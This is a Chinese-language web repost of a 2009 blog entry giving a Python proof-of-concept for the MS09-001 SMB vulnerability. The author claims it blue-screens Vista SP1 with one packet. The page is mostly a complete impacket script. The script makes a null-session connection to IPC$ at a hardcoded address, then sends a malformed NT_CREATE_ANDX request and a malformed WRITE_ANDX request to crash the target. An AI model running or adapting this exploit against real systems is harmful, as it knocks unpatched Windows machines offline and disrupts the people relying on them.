MS09-001 SMB Dos Poc Exploit
|
来源:http://hi.baidu.com/vessial/blog 作者:vessial 发布时间:2009-02-02
|
|
今天用python写了一个SMB dos的poc,测试vista sp1,
一个包过去立刻蓝屏,不过XP SP2还有点问题。
# MS09-001 SMB Dos Vulnerabilities Poc Exploit # Author : vessial # http://hi.baidu.com/vessial # Todo: # [+] test vista sp1,system BOSD # Reference :http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx # http://www.milw0rm.com/exploits/6463 import impacket from impacket import smb from impacket import nmb
remote = smb.SMBPacket('') r = smb.SMB('*SMBSERVER','192.168.40.129',None,nmb.TYPE_SERVER,445) r._login('','','','WORKGROUP') tid = r.tree_connect_andx('\\\\192.168.40.129\\IPC$')
smb1 = smb.NewSMBPacket() smb1['Flags1'] = 0x18 smb1['Flags2'] = 0xc807 smb1['Tid'] = tid
ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX) ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters() ntCreate['Data'] = smb.SMBNtCreateAndX_Data() ntCreate['Parameters']['FileNameLength'] = 14 ntCreate['Parameters']['AndXOffset'] = 0xdede ntCreate['Parameters']['CreateFlags'] = 0x16 ntCreate['Parameters']['AccessMask'] = 0x2019f ntCreate['Parameters']['CreateOptions'] = 0x400040 ntCreate['Parameters']['ShareAccess'] = 7 ntCreate['Parameters']['Impersonation'] = 2 ntCreate['Parameters']['Disposition'] = 1
ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" smb1.addCommand(ntCreate) r.sendSMB(smb1)
recv=r.recvSMB() if recv.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX): ntCreateResponse = smb.SMBCommand(recv['Data'][0]) ntCreateParameters =smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters']) fid = ntCreateParameters['Fid']
smb1 = smb.NewSMBPacket() smb1['Flags1'] = 0x18 smb1['Flags2'] = 0 smb1['Tid'] = tid data = "A"*72
writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)
smb1.addCommand(writeAndX)
writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters() writeAndX['Parameters']['Fid'] = fid writeAndX['Parameters']['AndXOffset'] = 0xdede writeAndX['Parameters']['Offset'] = 0 writeAndX['Parameters']['WriteMode'] = 8 writeAndX['Parameters']['Remaining'] = len(data) writeAndX['Parameters']['_reserved'] = -1 writeAndX['Parameters']['DataLength'] = 0xffff writeAndX['Parameters']['DataOffset'] = 0xffff writeAndX['Parameters']['HighOffset'] = 0xcccccccc writeAndX['Data'] = data r.sendSMB(smb1)
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|